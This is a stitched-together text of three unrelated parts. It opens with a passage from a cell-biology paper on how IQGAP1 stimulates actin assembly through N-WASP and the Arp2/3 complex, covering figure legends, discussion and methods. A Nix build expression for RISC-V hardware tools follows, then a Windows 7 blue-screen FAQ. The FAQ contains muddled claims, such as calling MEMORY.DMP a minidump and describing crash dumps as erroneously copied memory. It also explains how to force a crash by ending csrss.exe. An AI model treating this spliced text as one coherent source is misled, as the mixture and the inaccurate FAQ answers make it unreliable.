Fig. 5. N-WASP is required for FGF2-stimulated migration of MDBK cells. (A) MDBK cells were transfected with N-WASP-specific siRNA or scrambled RNA (scrRNA) using a Nucleofector. To allow direct visual comparison of N-WASP levels in the two samples by western blotting, a concentration series of each cell extract was analyzed at the indicated relative dilutions. Note that siRNA reduced the N-WASP level to ∼1/3 of normal, but had no effect on cellular IQGAP1 content. (B) Confluent monolayers were then serum-starved for 8 hours, wounded with a micropipette tip, and 2 hours later were stimulated with 25 ng/ml FGF2. Note that movement of N-WASP-depleted cells into the wound after 9 or 24 hours of FGF2 exposure was severely impaired. (C) Percentage of wound closure was quantified by measuring the average width of eight randomly chosen regions of interest of each wound at 0, 9, and 24 hours after FGF2 addition. Data are expressed relative to the average wound widths at 0 hours. Error bars indicate standard deviations for three experiments, and asterisks (*) indicate significant differences between scrRNA controls and corresponding siRNA-treated cultures at α<0.001.
Confirmation that IQGAP1 promoted branched actin filament nucleation was obtained by direct visualization of actin polymerization stimulated by IQGAP1 in the presence of the Arp2/3 complex and N-WASP, by total internal reflection fluorescence (TIRF) microscopy (Kuhn and Pollard, 2005) (Fig. 6C and supplementary material, Movie 1). The rates at which total filament length increased with or without IQGAP1 were similar until ∼100 seconds, when the rate began to increase more rapidly in the IQGAP1-containing sample (Fig. 6D). The time point for this transition was also marked by a large increase in the rate at which filament branches appeared in the IQGAP1-containing sample. Indeed, by plotting the number of branches per μm of filament length as a function of time, it became apparent that after 100 seconds of assembly, the density of branches in the presence of IQGAP1 was four- to fivefold higher than in its absence, relatively constant with time for the next 500 seconds, and comparable to what was observed when an optimal concentration of GTP-bound Cdc42, a robust N-WASP activator (Rohatgi et al., 2000; Rohatgi et al., 1999), was used in place of IQGAP1 (Fig. 6E). These results confirm and extend the conclusion from spectrofluorometric assays (Fig. 6A) that IQGAP1 stimulates branched actin filament nucleation by activating N-WASP, and by extension, the Arp2/3 complex. In addition to binding and activating N-WASP, GTP-activated Cdc42 binds directly to IQGAP1 (Hart et al., 1996; Kuroda et al., 1996; McCallum et al., 1996). We therefore compared the ability of activated Cdc42 and IQGAP1, individually and together, to stimulate actin assembly (Fig. 7A). In the presence of 2 μM actin, 50 nM Arp2/3 complex and 350 nM N-WASP, optimal concentrations of activated Cdc42 (105 nM) and IQGAP1 (35 nM) promoted actin polymerization nearly identically. When both Cdc42 and IQGAP1 were present, however, the lag time before Vmax was reached was dramatically reduced and the peak assembly rate increased additively. Similar results were obtained when the concentrations of actin, Arp2/3 complex and N-WASP were as low as 1.3 μM, 30 nM and 50 nM, respectively. IQGAP1 and activated Cdc42 can thus work in concert to drive especially rapid nucleation of actin filament branches. To investigate why stimulation of actin assembly occurs within a narrow range of IQGAP1 concentrations (Fig. 6A and Fig. 8B), we monitored effects of IQGAP1 on assembly stimulated by the Arp2/3 complex plus the N-WASP VCA fragment, which constitutively activates the Arp2/3 complex (Rohatgi et al., 1999). As shown in Fig. 7B, IQGAP1 did not bind GST-VCA, but did exhibit dose-dependent inhibition of actin assembly in the presence of GST-VCA plus the Arp2/3 complex. By contrast, IQGAP1ΔNT, which lacks the first 156 N-terminal amino acids of full-length IQGAP1 and does not bind F-actin (see supplementary material Fig. S1), had no effect on actin assembly stimulated by GST-VCA and the Arp2/3 complex. These data suggest that high concentrations of full-length IQGAP1 are less effective at stimulating actin assembly by the Arp2/3 complex and N-WASP because of competition between IQGAP1 and the Arp2/3 complex for binding to existing actin filaments, where the Arp2/3 complex most efficiently nucleates new actin filaments. Stimulation of actin assembly through N-WASP and the Arp2/3 complex was also observed for three progressively smaller N-terminal IQGAP1 fragments (Fig. 
8A,B): IQGAP12-522, a homodimer that binds F-actin (Mateer et al., 2002), IQGAP12-210, an F-actin binding monomer (Mateer et al., 2004), and IQGAP12-71, a presumptive monomer that does not bind F-actin (Mateer et al., 2004). By contrast, IQGAP1ΔNT showed little evidence of assembly stimulation. Like full-length IQGAP1, each N-terminal fragment had an optimal concentration for stimulating the rate of actin assembly. The Vmax for each fragment at its optimal concentration was similar to that observed for full-length IQGAP1, although the lag time before Vmax was reached was much longer for the stimulatory fragments than for full-length IQGAP1 (Fig. 8B). We, therefore, conclude that several N-terminal fragments of IQGAP1 can stimulate actin assembly in the presence of the Arp2/3 complex and N-WASP, albeit not as well as full-length IQGAP1. Furthermore, this stimulatory activity of IQGAP1 does not require dimerization or binding to actin filaments.

Fig. 6. Stimulation of branched actin filament assembly by IQGAP1. (A) Effects of IQGAP1 on actin (5% labeled with pyrene) assembly in the presence of N-WASP and the Arp2/3 complex were monitored using a pyrene-actin fluorescence assay. Note that maximal stimulation of assembly was achieved at 30 nM IQGAP1, and that higher and lower concentrations stimulated less or not at all. (B) Actin assembly stimulation by IQGAP1 requires N-WASP plus Arp2/3 complex. (C) IQGAP1-stimulated assembly of branched actin filament networks observed directly by TIRF microscopy. (D) Total lengths of actin filaments observed by TIRF microscopy were measured as a function of time, for samples containing or lacking IQGAP1 or activated Cdc42, a previously described N-WASP activator (Rohatgi et al., 1999). Maximum rates of actin assembly were achieved in the IQGAP1 sample. (E) The same micrographs were used to determine the number of filament branch points per μm of actin filament as a function of time. Note that the IQGAP1 and Cdc42 samples quickly attained a filament branch density four- to fivefold greater than the control sample that contained neither IQGAP1 nor Cdc42.

Actin assembly stimulation in the presence of the Arp2/3 complex and N-WASP is well correlated with direct binding of IQGAP1 or IQGAP1 fragments to N-WASP. Purified, N-terminally his-tagged versions of full-length IQGAP1, IQGAP12-522, IQGAP12-210, IQGAP12-71, and IQGAP1ΔNT were bound to nickel-agarose beads and mixed with purified N-WASP. Fig. 8C demonstrates that N-WASP bound specifically to all IQGAP1 proteins tested. These results establish the presence of an N-WASP binding region near the N terminus of IQGAP1, and imply that binding underlies N-WASP activation. The ability of IQGAP1ΔNT to bind N-WASP despite its borderline ability to stimulate actin assembly indicates, however, that binding and activation of N-WASP are separable. Using similar nickel-agarose pull-down assays, we did not detect direct binding of IQGAP1 to the Arp2/3 complex (not shown).

Fig. 7. Co-stimulation of actin assembly by IQGAP1 plus activated Cdc42, and inhibition of VCA-stimulated actin assembly by IQGAP1. (A) When used together, IQGAP1 and activated Cdc42 stimulated actin assembly rates additively, and virtually eliminated the lag period before peak assembly rates were reached using either IQGAP1 or activated Cdc42 alone. (B) In the presence of a GST-tagged, constitutively active, N-WASP VCA fragment, IQGAP1, but not IQGAP1ΔNT, caused dose-dependent inhibition of assembly.

Discussion

The collective data presented here suggest that activation of a cell surface receptor, FGFR1, by one of its extracellular ligands, FGF2, recruits IQGAP1 to the cortically localized cytoplasmic domain of the receptor. IQGAP1 then promotes branched actin filament nucleation through N-WASP and the Arp2/3 complex, and as a result, lamellipodial protrusion, in the immediate vicinity of activated receptors. This mechanism, by which IQGAP1 serves as an intermediate between growth factor signaling and cellular morphogenesis and motility, likely applies to IQGAP1-dependent migration of endothelial cells stimulated by VEGF binding to VEGFR2 (Yamaoka-Tojo et al., 2004), and may apply to other growth factor-receptor pairs that await identification. A different member of the IQGAP family, IQGAP2, which is 62% identical in amino acid sequence to IQGAP1 (Brill et al., 1996), may use a related mechanism to trigger actin assembly and cellular morphogenesis in platelets. The filopodia and lamellipodia that platelets elaborate after thrombin activation may owe their formation to thrombin-induced macromolecular assemblies of IQGAP2, actin and the Arp2/3 complex (Schmidt et al., 2003). A key question that remains unanswered is why suppression of IQGAP1 protein levels so dramatically reduces cell motility (Fig. 1 and Fig. 5C) (see also Mataraza et al., 2003; Watanabe et al., 2004; Yamaoka-Tojo et al., 2004) when several N-WASP-independent pathways for activating Arp2/3 complex-mediated cell motility are known to exist (Miki and Takenawa, 2003), and WAVE2 (Suetsugu et al., 2003; Yamazaki et al., 2003), rather than N-WASP (Benesch et al., 2005), is thought to be the principal Arp2/3 complex activator for lamellipodial advance. Among many possible explanations worth exploring are that specific receptor-ligand pairs, such as FGFR1-FGF2 and VEGFR2-VEGF, trigger Arp2/3 complex activation primarily through IQGAP1 and N-WASP, that N-WASP is not the only Arp2/3 complex activator that can be stimulated by IQGAP1, and that actin assembly stimulated by IQGAP1 indirectly supports lamellipodial protrusion. Regarding the last possibility, IQGAP1 knockdown may impair cell motility because it reduces the levels of activated Cdc42 and Rac1 (Mataraza et al., 2003), which are known to stimulate the Arp2/3 complex indirectly through activation of WASP/WAVE proteins (Pollard and Borisy, 2003). Alternatively, receptor trafficking, which could be required for sustained cell migration in response to extracellular growth factors, may depend on actin assembly stimulated by IQGAP1. In favor of the receptor trafficking model is evidence that N-WASP, along with the Arp2/3 complex, is recruited to clathrin-coated pits as they invaginate, and is required for receptor-mediated endocytosis of EGF receptors (Benesch et al., 2005). Considering the ability of IQGAP1 to bind N-WASP directly (Fig. 8C) and to stimulate actin assembly through N-WASP and the Arp2/3 complex (Fig. 6), it is possible that IQGAP1 is necessary for normal FGFR1 trafficking, at least at the step of receptor endocytosis, which in turn might be required for formation of productive protrusions in cells stimulated by FGF2.

Fig. 8. IQGAP1 fragments stimulate actin assembly and bind N-WASP. (A) A schematic representation of functional domains present in recombinant full-length IQGAP1 and four fragments used for experiments documented here: CHD, F-actin-binding calponin homology domain; IR, IQGAP repeats that mediate homodimerization; WW, ERK2-binding WW domain; IQ, calmodulin-binding IQ motifs; GRD, GAP (GTPase activating protein)-related domain involved in binding activated Cdc42 and Rac1. All proteins were his-tagged at their N termini, and the diagrams indicate whether each protein is a monomer or homodimer in aqueous solution. (B) The pyrene actin assembly assay was used to evaluate each protein at several concentrations in the presence of 1.3 μM actin (5% pyrene-labeled), 50 nM N-WASP and 50 nM Arp2/3 complex. Shown here are the maximum velocities (Vmax) of actin assembly (upper panels) and lag times before Vmax was reached (lower panels). Note that optimal concentrations of all recombinant proteins, except IQGAP1ΔNT, supported a Vmax approx. twofold higher than controls that contained only actin, N-WASP and Arp2/3 complex, but that the optimal concentration of full-length IQGAP1 (IQGAP1FL) reached Vmax at least twice as fast as the fragments. (C) N-WASP was mixed with nickel-agarose beads or nickel-agarose beads that were pre-loaded with recombinant, his-tagged IQGAP1FL, IQGAP1ΔNT, IQGAP12-522, IQGAP12-210, IQGAP12-71, or tau as a negative control. Beads contained an approx. twofold molar excess of his-tagged proteins relative to N-WASP, and chemiluminescent immunoblotting was used to detect any N-WASP that may have bound to beads. Note the specific binding of N-WASP to all forms of IQGAP1 that were tested. The slightly increased electrophoretic mobility of N-WASP in the IQGAP12-522 pull-down assay probably represents a gel artefact caused by the fact that N-WASP and IQGAP12-522 migrate nearly identically in SDS-PAGE.

An equally attractive possibility concerns the mechanical strength of branched actin filament networks. IQGAP1 is a homodimeric protein that can crosslink actin filaments (Bashour et al., 1997) because it contains an F-actin binding calponin homology domain on each of its two identical subunits (Mateer et al., 2004). By joining N-WASP and the Arp2/3 complex in a supramolecular complex that nucleates actin filament branches, IQGAP1 may reside at the junction of mother and daughter filaments in branched filament networks, where it would be ideally positioned to crosslink mother and daughter filaments, and thus might provide branched filament networks with increased mechanical integrity. Fortifying filament networks in such a manner could allow filaments that are at the leading edge and anchored to the lamellipodial network to push forward the plasma membrane more effectively as filament polymerization proceeds. We are not aware of any protein other than IQGAP1 that both stimulates branched actin filament nucleation through the Arp2/3 complex and crosslinks actin filaments. Thus, even if IQGAP1 were a relatively minor stimulator of the Arp2/3 complex in most cellular contexts, its actin filament crosslinking activity could be crucial for formation of productive lamellipodia. Although direct binding of activated Cdc42 to N-WASP allows N-WASP to stimulate the actin filament nucleating activity of the Arp2/3 complex in vitro in the absence of additional factors (Rohatgi et al., 1999), other proteins could play very important roles in this process. For example, WASP-interacting protein (WIP)-mediated inhibition of N-WASP can be relieved by activated Cdc42, but in a manner dependent on formin-binding protein 1-like (FNBP1L, also known as Toca-1), which binds both activated Cdc42 and N-WASP (Ho et al., 2004). By comparison, and as shown here, IQGAP1 can bind and stimulate N-WASP independently of activated Cdc42 (Fig. 6, Fig. 7A and Fig. 8C), but can also act cooperatively with activated Cdc42 to promote actin filament nucleation in vitro through N-WASP and the Arp2/3 complex (Fig. 7A). In the latter case, IQGAP1, like Toca-1, may engage activated Cdc42 and N-WASP as a complex that sustains a high level of filament formation at the leading edge of motile cells. The increased number of lamellipodial protrusions and their faster rate of forward extension after stimulation of MDBK cells with FGF2 are consistent with this idea. The fact that IQGAP1 depletion leads to reduced levels of activated Cdc42 and Rac1 in cells (Mataraza et al., 2003) provides additional support for this notion. Cdc42 binds IQGAP1 with 50-fold higher affinity than it binds WASP, a protein closely related to N-WASP (Zhang et al., 1997), so IQGAP1 could serve to anchor activated Cdc42 in close association with N-WASP. Finally, IQGAP1 and WASP interact with physically distinct regions of activated Cdc42 (Li et al., 1999), so maximal activation of N-WASP might be achieved by simultaneous interactions of activated Cdc42 with both IQGAP1 and N-WASP. Thus, a Cdc42-IQGAP1 complex, rather than Cdc42 and IQGAP1 acting independently, may be responsible for maintaining N-WASP-dependent and Arp2/3 complex-dependent protrusive activity. On the other hand, binding of activated Cdc42 to IQGAP1 would also be expected to increase cell-cell adhesion by dissociating IQGAP1 from E-cadherin and β-catenin, and thereby strengthen the cadherin-catenin-actin connection that acts as a counterforce to cell migration (Kuroda et al., 1998). The apparent migration-promoting and cell-cell adhesion-promoting activities of IQGAP1 are not necessarily in conflict, but it seems unlikely that decreased intercellular adhesion underlies IQGAP1-dependent cell motility induced by FGF2. On the contrary, assuming that one effect of FGF2 stimulation was an increase in IQGAP1-dependent intercellular adhesion, that effect must be overwhelmed by IQGAP1-dependent actin assembly and consequent lamellipodial protrusion induced by FGF2. The failure of FGFR1, N-WASP and the Arp2/3 complex to be recruited to the cell cortex following FGF2 stimulation of IQGAP1-deficient cells (Fig. 4) indicates that IQGAP1 plays a far broader role in cell motility than merely stimulating actin filament nucleation. IQGAP1 also appears to recruit to the cell surface many key components of the motile machinery. This finding is reminiscent of recent reports that IQGAP1 integrates the actin and microtubule cytoskeletons by binding directly to both CLIP-170 and APC, which are microtubule plus end tracking proteins (Fukata et al., 2002; Watanabe et al., 2004). IQGAP1 may thus be a master organizer of signal transduction, cytoskeletal and cell adhesion molecules that act cooperatively to regulate cell motility and morphogenesis. We suggest in particular that the interaction of IQGAP1 with FGFR1 represents a critical step that bridges extracellular signals with cellular responses. IQGAP1 may establish or maintain FGF2-dependent signaling by regulating the polarized distribution of FGFR1 receptors at the cell surface.
Through its F-actin binding activity, IQGAP1 may stabilize connections among cell surface FGFR1, cortical F-actin and the machinery that powers cell movement. In this regard, IQGAP1 and N-WASP may function to maintain FGFR1 homeostasis at the plasma membrane.

Materials and Methods

Antibodies

The following antibodies were used: primary mouse monoclonal anti-IQGAP1 (Mateer et al., 2002), anti-actin (Chemicon) and tau-1 (Binder et al., 1985), and rabbit polyclonal antibodies to IQGAP1 (Mateer et al., 2002), N-WASP (Santa Cruz), Arp3 (Welch et al., 1997) and FGFR1 (Santa Cruz). Secondary antibodies included goat anti-mouse IgG and goat anti-rabbit IgG labeled with FITC or TRITC (Southern Biotech, Birmingham, AL), goat anti-mouse IgG labeled with Alexa Fluor-647 (Molecular Probes), and goat anti-mouse IgG and goat anti-rabbit IgG labeled with horseradish peroxidase (KPL Inc., Gaithersburg, MD).

Cell culture, IQGAP1 and N-WASP knockdown, and wound healing

MDBK (Madin-Darby bovine kidney) epithelial cells were obtained from the American Type Culture Collection and maintained in Dulbecco's minimum essential medium (Gibco) plus 10% Cosmic calf serum (HyClone). siRNA for bovine IQGAP1 (target sequence: AAGGCTGAGCTGGTGAAACTG) and a scrambled (scrRNA) control (target sequence: AAGTACCAGGGACGTGAGTGT) were purchased from Qiagen as Alexa Fluor-647-labeled products. siRNA for N-WASP was purchased from Dharmacon (catalogue no. D-006444-06), and according to the manufacturer was directed against a human N-WASP sequence that is identical to the corresponding bovine N-WASP sequence. 2 μg of siRNA specific for IQGAP1 or N-WASP, or 2 μg of scrRNA were transfected into MDBK cells using a Nucleofector (Amaxa, Cologne, Germany) and the protocol specifically recommended by the manufacturer for MDBK cells (Nucleofector Kit R and program X-001). 48-72 hours after transfection, confluent monolayers of cells that were growing in 24-well dishes and had been serum starved for the previous 8 hours were wounded by scratching with a micropipette tip. The cells were allowed to recover for 2 hours, after which media were replaced with fresh media containing or lacking 25 ng/ml FGF2 (Sigma). Phase contrast micrographs of the cultures were taken within 30 minutes after wounding and at various times thereafter using Scion Image software (Scion, Frederick, MD) and a Cohu model 2222-1000 camera mounted on a Nikon Diaphot microscope with a Nikon 10×, 0.25 NA, phase 1 DL objective.

Kymographic analysis

MDBK cell cultures were transfected by nucleofection with scrRNA or siRNA and grown to confluence, after which 5×10⁴ cells were subcultured onto 25 mm round, #1 thickness coverslips coated with 5 μg/ml fibronectin (Sigma), and grown overnight in serum-containing medium. The cells were then cultured for at least 14 hours in serum-free medium, and finally for 4 hours in Phenol-Red-free MEM containing 15 mM Hepes (Gibco). Following this MEM acclimation period, cells were imaged by time-lapse phase contrast microscopy at 12 frames per minute beginning 5 minutes before addition of 50 ng/ml FGF2, which occurred 48-72 hours after transfection. Images were captured without binning using a Hamamatsu Orca-ER 1.3 megapixel cooled CCD mounted on a Zeiss Axiovert S100 equipped with a Zeiss 63× 1.4 NA phase 3 planapochromatic objective. Cells were maintained on the microscope stage in Attofluor Cell Chambers (BD Bioscience, Rockville, MD) at 37°C in an atmosphere of 95% air plus 5% CO2. OpenLab 4 software (Improvision) running on a Power Macintosh G4 computer (Apple) was used to control the camera and shutters, and to program the time-lapse parameters. NIH Image 1.62 public domain software (http://rsb.info.nih.gov/nih-image/) was used to generate kymographs of lamellipodia (Hinz et al., 1999) from user-specified regions of interest. Excel 2004 for Mac (Microsoft) was used to generate the bar graphs of protrusion frequency, velocity and persistence shown in Fig. 2B, and SPSS 11 for Mac OS X statistical software (SPSS, Inc.) was used for one-way ANOVA (see supplementary material Table S1).

Fluorescence microscopy

Cells were fixed and permeabilized either by immersion for 5 minutes in methanol at –20°C, or by successive incubations in 4% paraformaldehyde in PBS (10 minutes) followed by 0.2% Triton X-100 (2 minutes). After fixation and permeabilization, cells were washed thoroughly and incubated successively with primary and secondary antibodies for 1 hour each, with several washes after each antibody step. F-actin was detected in paraformaldehyde-fixed, Triton X-100-permeabilized cells with Alexa Fluor 568-phalloidin (Molecular Probes). Fluorescence confocal micrographs were taken using a CARV spinning disk confocal head (Atto Instruments) mounted on the Zeiss microscope system described earlier.

Immunoprecipitation

Sub-confluent MDBK cells were serum starved for 12-18 hours, before being stimulated with 50 ng/ml FGF2. Cells harvested just prior to FGF2 addition and at various times thereafter were lysed in buffer A (50 mM Hepes pH 7.4, 50 mM NaCl, 0.5% sodium deoxycholate, 1 mM EDTA, 1% Triton X-100, 2 mM NaVO4, 20 mM NaF, 1 mM PMSF, and 2 μg/ml each of chymostatin, leupeptin and pepstatin A), and the lysates were then clarified by centrifugation. Monoclonal anti-IQGAP1, or monoclonal tau-1 as an irrelevant control, was then added to the clarified lysates, which were subsequently incubated for 4 hours at 4°C. Next, EZview red protein-G affinity gel beads (Sigma) were added to samples, which were incubated for an additional 2 hours at 4°C. Immuno-complexes were collected by brief centrifugation, washed in buffer B (50 mM Tris pH 7.4, 150 mM NaCl, 0.5% Triton X-100, 1 mM PMSF), and analyzed by immunoblotting using polyclonal antibodies to IQGAP1, N-WASP, Arp3 and FGFR1, and SuperSignal chemiluminescent reagents (Pierce).

Affinity pull-down assay

Coding DNA for the FGFR1 cytoplasmic domain was amplified by PCR from mouse brain cDNA using the following primers: forward, 5′-gtcatcatctataagatgaagagcggc-3′; reverse, 5′-ctcaggtaacggctcatgagagaagac-3′. EcoRI and NotI cloning sites were added by PCR using these primers: forward, 5′-gcgggaattcgtcatcatctaaga-3′; reverse, 5′-gaagcggccgcctcaggtaacgg-3′. GST-FGFR1 tail and unmodified GST were expressed in transformed E. coli (strain BL21), and purified from bacterial lysates using glutathione-Sepharose 4B beads (Pharmacia). Glutathione-Sepharose 4B beads containing ∼2 μM GST-FGFR1 tail or GST were then mixed with 1 μM IQGAP1FL; Ni-NTA-agarose (nickel) affinity beads (Qiagen) containing ∼1 μM his-tagged IQGAP1FL, IQGAP1ΔNT, IQGAP12-522, IQGAP12-210, IQGAP12-71, or tau were mixed with 500 nM N-WASP. After a 1-hour incubation, beads were collected by centrifugation and washed, and bound proteins were analyzed by chemiluminescent immunoblotting.

Pyrene-actin assembly assay

Previously published methods were used to purify rabbit muscle actin (Bashour et al., 1997), and recombinant, his-tagged IQGAP1FL, IQGAP1ΔNT, IQGAP12-522, IQGAP12-210 and IQGAP12-71 (Mateer et al., 2004). IQGAP1ΔNT is a newly described deletion mutant derived from a pBlueScript II SK(+) plasmid containing the full-length human cDNA for IQGAP1 (pBSIQG1-MH) by the same methods used to create the other IQGAP1 deletion mutants used in this study. IQGAP1ΔNT lacks only the first 156 amino acids of full-length IQGAP1, and was purified from baculovirus-infected Sf9 insect cells. Published methods were also used for purifying GST-VCA from bacteria (Egile et al., 1999), the Arp2/3 complex from bovine calf thymus (Higgs et al., 1999) and rat N-WASP from baculovirus-infected Sf9 cells (Miki et al., 1998), and for covalently coupling pyrene to purified actin (Bryan and Coluccio, 1985). Pyrene-actin assembly assays were performed in polymerization buffer (2 mM Tris and 20 mM imidazole, pH 7.5, 100 mM KCl, 2 mM MgCl2, 1 mM EGTA, 0.1 mM EDTA, 1 mM DTT, 0.2 mM ATP and 0.2 mM PMSF) using 365 nm excitation and 386 nm emission in a Photon Technology Incorporated model QM-4/5000 spectrofluorometer. In each assay, 5% of the total actin was pyrene-labeled. Prior to performing actin assembly assays by spectrofluorometry or TIRF microscopy, proteins were dialyzed overnight at 4°C in the following buffers: actin (2 mM Tris pH 8.0, 0.2 mM ATP, 0.1 mM DTT, 0.2 mM CaCl2); the Arp2/3 complex (20 mM Tris pH 7.5, 50 mM KCl, 0.2 mM EGTA, 0.2 mM MgCl2, 0.1 mM ATP, 0.5 mM DTT); all forms of IQGAP1 (50 mM Tris pH 7.5, 20 mM imidazole, 200 mM KCl, 1 mM EGTA, 0.1 mM ATP, 1 mM DTT, 0.1 mM PMSF); N-WASP (20 mM Tris pH 7.5, 10 mM EDTA, 0.1 mM PMSF). Following dialysis, insoluble protein was removed from each sample by centrifugation for 30 minutes at 4°C at 213,483 g (max.) in a Beckman TLA 120.1 rotor using a Beckman Optima TLX Ultracentrifuge. Next, the actin was mixed with EGTA to 1 mM and MgCl2 to 0.1 mM, and then incubated for 2 minutes at room temperature. During this 2 minute period, the remaining proteins were mixed together, and the cocktail was adjusted with concentrated stock solutions of buffers, salts, ATP and PMSF to yield a final solution composition at pH 7.5 of 20 mM Tris, 20 mM imidazole, 100 mM KCl, 2 mM MgCl2, 1 mM EGTA, 1 mM DTT, 0.2 mM ATP and 0.2 mM PMSF.

TIRF microscopy

Methods for preparing Oregon Green-labeled actin, and TIRF microscopy have been described previously (Kuhn and Pollard, 2005). Images were captured at 5-second intervals on an Olympus IX 71 inverted microscope using a 60×/1.45 NA Olympus objective, a Melles Griot 25 mW argon laser, a Roper CoolSNAP cooled CCD, and Scanalytics IP Lab software. Samples were prepared exactly as for pyrene-actin assembly assays, except that Oregon Green-actin was used at 20% of total actin in place of 5% pyrene-actin. Sample chambers were coated with 6.25-25 nM N-ethylmaleimide-modified (Veigel et al., 1998) rabbit skeletal muscle myosin II (Sigma) prior to loading actin assembly cocktails into the chambers. TIRF experiments were typically terminated after 10 minutes, when substrate-bound actin filaments became so dense that it was no longer possible to resolve individual filaments.

Acknowledgments

This work was supported by NIH grants NS30485 and NS051746, and a University of Virginia Digestive Diseases Research Center Pilot/Feasibility Award through NIH P30 grant DK067629 to G.S.B.; and NIH grant GM067222 to D.A.S. The authors thank Scott Mateer and Leah Morris for their contributions to this project during its initial stages, Jean-Marie Sontag for designing the IQGAP1 fragments, Megan Bloom for assistance with the statistical analysis, and Ammasi (Peri) Periasamy for help with TIRF microscopy. We also thank Ruth Kroschewsky (ETH Zurich) and Marie-France Carlier (CNRS, Gif-sur-Yvette) for sharing data about their parallel study (Le Clainche et al., 2007) prior to publication.

Footnotes

• Accepted December 8, 2006.
{ pkgs }: rec {
  drvs = rec {
    yosys = pkgs.callPackage ./eda/yosys.nix {};
    symbiyosys = pkgs.symbiyosys.override { inherit yosys; };
    nmigen = pkgs.callPackage ./eda/nmigen.nix { inherit yosys; };
    scala-spinalhdl = pkgs.callPackage ./eda/scala-spinalhdl.nix {};
    jtagtap = pkgs.callPackage ./cores/jtagtap.nix { inherit nmigen; };
    minerva = pkgs.callPackage ./cores/minerva.nix { inherit nmigen; inherit jtagtap; };
    vexriscv-small = pkgs.callPackage ./cores/vexriscv.nix {
      inherit scala-spinalhdl;
      name = "vexriscv-small";
      scalaToRun = "vexriscv.demo.GenSmallAndProductive";
    };
    heavycomps = pkgs.callPackage ./heavycomps.nix { inherit nmigen; };
    binutils-riscv = pkgs.callPackage ./compilers/binutils.nix { platform = "riscv32"; };
    rust-riscv32imc-crates = pkgs.callPackage ./compilers/rust-riscv32imc-crates.nix { };
    fw-helloworld = pkgs.callPackage ./firmware { inherit rust-riscv32imc-crates binutils-riscv; };
  };
  lib = {
    symbiflow = import ./eda/symbiflow.nix { inherit pkgs; inherit (drvs) yosys; };
    vivado = import ./eda/vivado.nix { inherit pkgs; };
  };
}
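The expression above carries no usage notes. As a purely hypothetical sketch, assuming it is saved as ./default.nix in the repository root, one of its derivations could be built like this (the file name and attribute choice are assumptions, not stated anywhere in the source):

    # build-fw.nix -- hypothetical usage of the expression above,
    # assuming it is saved as ./default.nix
    let
      pkgs = import <nixpkgs> {};
      proj = import ./default.nix { inherit pkgs; };
    in
      # e.g. `nix-build build-fw.nix` would build the hello-world firmware
      proj.drvs.fw-helloworld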
How To Fix Blue Screen Windows 7 Memory Dump?

Check for hard disk issues:
• Click Start.
• Go to Computer.
• Right-click on the main drive, where Windows 7 is installed, and click Properties.
• Click the Tools tab and, in the Error-checking section, click Check now.
• Select both Automatically fix file system errors and Scan for and attempt recovery of bad sectors.
• Click Start.

How do I fix a blue dump error?

Using Safe mode to fix a stop error:
1. Click the Advanced Startup option.
2. Click the Troubleshoot option.
3. Click on Advanced options.
4. Click the Startup Settings option.
5. Click the Restart button.
6. After your computer reboots, press F4 (or 4) to select the Enable Safe Mode option.

What is the cause of blue screen in Windows 7?

If a driver you've installed is causing Windows to blue screen, it shouldn't do so in safe mode. Check for hardware problems: blue screens can be caused by faulty hardware in your computer. Try testing your computer's memory for errors and checking its temperature to ensure that it isn't overheating.

What causes a memory dump in Windows 7?

When a Windows 7 crash occurs, solutions providers should check the crash dump, also called "minidump," files that Windows creates for debugging, located at %SystemRoot%\MEMORY.DMP. This file usually points to the cause of any BSOD or black-screen issues, such as video adapter problems or application bugs.

What is dumping physical memory to disk?

A memory dump is a process in which the contents of memory are displayed and stored in case of an application or system crash. These are the possible reasons for a Physical Memory Dump error: corrupted system files, a damaged hard disk, corrupted RAM, or incompatibility between hardware and software.

Can the Blue Screen of Death Be Fixed?

BSoDs can be caused by poorly written device drivers or malfunctioning hardware, such as faulty memory, power supply issues, overheating of components, or hardware running beyond its specification limits. In the Windows 9x era, incompatible DLLs or bugs in the operating system kernel could also cause BSoDs.

Is blue screen of death bad?

zyrrahXD asked the Windows forum if a Blue Screen of Death can severely damage a PC. A BSoD can be a symptom of a hardware problem. In that case, it might look as if the error itself caused the problem. Although a BSoD won't damage your hardware, it can ruin your day.

How do I get rid of the blue screen on Windows 7?

If you have Startup Repair preinstalled on the system:
• Remove any CDs, DVDs or USBs from the system.
• Restart your computer.
• Press and hold F8 as your computer boots, but before the Windows 7 logo appears.
• At the Advanced Boot Options screen, select Repair your computer using the arrow keys and hit Enter.

How do I disable BIOS memory in Windows 7?

Part 2: Disabling Memory Options
1. Go to the "Advanced" page. Select Advanced at the top of the screen by pressing the → arrow key, then press ↵ Enter.
2. Look for the memory option you want to disable.
3. Select a memory item you want to disable.
4. Press the "Change" key.
5. Press the Esc key.
6. Press ↵ Enter when prompted.

How can I get the blue screen of death?

To make a harmless and real blue screen of death (BSOD), right-click the taskbar, click Start Task Manager, click the Processes tab, click Show processes from all users, right-click csrss.exe and click End process. Check Abandon unsaved data and shut down, then click Shut down. Restart your PC and it's normal again.

How do I open a crash dump file in Windows 7?
Opening Memory Dump Files:
• Open the Start menu.
• Type windbg.exe.
• Click File and select Open Crash Dump.
• Browse to the .dmp file you wish to analyze.
• Click Open.

How do I fix Windows 7 from hanging?

Step 1: Log into Windows 7 with Administrator rights, click on the Start button and type in MSCONFIG in the search box. Step 2: Click on the General tab and choose Selective Startup. Make sure to uncheck the box that says "Load Startup Items".

How do I dump memory in Windows 7?

On your desktop:
1. Click Start, right-click Computer and select Properties.
2. Click Advanced system settings.
3. Click the Advanced tab.
4. Under the Write debugging information section, click Settings.
5. Select the Complete memory dump.

What is a memory dump blue screen?

How to Fix a Blue Screen Memory Dump: a blue screen memory dump is an error screen that comes up just before the system gets rebooted, because the operating system is no longer able to function properly due to a variety of reasons, and the content of the RAM is dumped onto a data file.

What does memory dump mean?

A memory dump is a process in which the contents of memory are displayed and stored in case of an application or system crash. A memory dump helps software developers and system administrators to diagnose, identify and resolve the problem that led to application or system failure.

What's a crash dump?

A crash dump is classified as an unexpected error simply because it can happen anytime. This type of malfunction can happen when a few portions of the processor's data or RAM memory are erroneously copied to one or more files. A crash dump usually points to some serious and critical errors with your computer.

How do I force a blue screen?

Use the Right Control + Scroll Lock + Scroll Lock key combination. The only thing left for you to do in order to trigger a nice Blue Screen Of Death is to hold down the Right Control key on your keyboard and then press the Scroll Lock key twice, in quick succession.

How do you analyze a blue screen?

How to Analyze a BSOD Crash Dump:
• Blue screens of death can be caused by a multitude of factors.
• Step 2: Run the Setup for the SDK.
• Step 3: Wait for the Installer.
• Step 4: Run WinDbg.
• Step 5: Set the Symbol Path.
